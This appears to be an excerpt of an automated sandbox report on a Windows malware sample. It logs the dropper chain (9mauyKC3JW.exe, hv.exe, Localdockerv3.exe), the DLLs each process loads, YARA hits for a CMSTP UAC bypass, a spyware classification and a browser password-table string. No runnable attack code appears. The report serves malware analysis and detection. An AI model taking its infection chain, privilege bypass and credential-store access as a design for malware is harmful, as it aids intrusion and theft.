                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400187908_2_0000000140018790
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140020BB88_2_0000000140020BB8
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C4528609_2_6C452860
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C45D4009_2_6C45D400
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C45D4E09_2_6C45D4E0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C44DD309_2_6C44DD30
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C44E5309_2_6C44E530
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C4551C09_2_6C4551C0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C454A409_2_6C454A40
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C451E509_2_6C451E50
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C44E6109_2_6C44E610
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C4532C09_2_6C4532C0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C454AD09_2_6C454AD0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C453AB09_2_6C453AB0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C44D7609_2_6C44D760
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C4517709_2_6C451770
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C4527309_2_6C452730
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C4523309_2_6C452330
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE6D76015_2_6BE6D760
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE7177015_2_6BE71770
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE7273015_2_6BE72730
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE7233015_2_6BE72330
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE732C015_2_6BE732C0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE74AD015_2_6BE74AD0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE73AB015_2_6BE73AB0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE74A4015_2_6BE74A40
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE71E5015_2_6BE71E50
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE6E61015_2_6BE6E610
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE751C015_2_6BE751C0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE6DD3015_2_6BE6DD30
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE6E53015_2_6BE6E530
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE7D4E015_2_6BE7D4E0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE7286015_2_6BE72860
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BFCD42015_2_6BFCD420
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BE7D40015_2_6BE7D400
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: String function: 0040243B appears 37 times
                  Source: hv.exe.0.drStatic PE information: Resource name: RT_RCDATA type: apollo a88k COFF executable
                  Source: hv.exe.2.drStatic PE information: Resource name: RT_RCDATA type: apollo a88k COFF executable
                  Source: Localdockerv3.exe.4.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
                  Source: hv.exe.0.drStatic PE information: Number of sections : 11 > 10
                  Source: yhg.4.drStatic PE information: Number of sections : 12 > 10
                  Source: hv.exe.2.drStatic PE information: Number of sections : 11 > 10
                  Source: cvnmq.16.drStatic PE information: Number of sections : 12 > 10
                  Source: 9mauyKC3JW.exe, 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 9mauyKC3JW.exe
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1446329500.0000000002650000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepdfium.dll. vs 9mauyKC3JW.exe
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1424529137.000000000092D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 9mauyKC3JW.exe
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000003345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepdfium.dll. vs 9mauyKC3JW.exe
                  Source: 9mauyKC3JW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 10.2.cmd.exe.2d607f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.Localdockerv3.exe.284faed.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.cmd.exe.2c34a28.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.Localdockerv3.exe.2788a20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.Localdockerv3.exe.28506ed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.Localdockerv3.exe.280aa20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.Localdockerv3.exe.27cdaed.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: classification engineClassification label: mal100.spyw.expl.evad.winEXE@20/23@1/1
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeFile created: C:\Users\user\AppData\Roaming\ChromewizardJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeFile created: C:\Users\user\AppData\Local\Temp\quwqJump to behavior
                  Source: 9mauyKC3JW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Localdockerv3.exe, 00000008.00000003.1975159475.0000000000AC6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 9mauyKC3JW.exeVirustotal: Detection: 29%
                  Source: 9mauyKC3JW.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeFile read: C:\Users\user\Desktop\9mauyKC3JW.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\9mauyKC3JW.exe "C:\Users\user\Desktop\9mauyKC3JW.exe"
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeProcess created: C:\Users\user\AppData\Local\Temp\hv.exe "C:\Users\user\AppData\Local\Temp\hv.exe"
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeProcess created: C:\Users\user\AppData\Local\Temp\hv.exe "C:\Users\user\AppData\Local\Temp\hv.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe C:\Users\user\AppData\Roaming\Chromewizard\hv.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exeJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: oledlg.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: mscms.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: coloradapterclient.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: oledlg.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: avifil32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: mscms.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: coloradapterclient.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
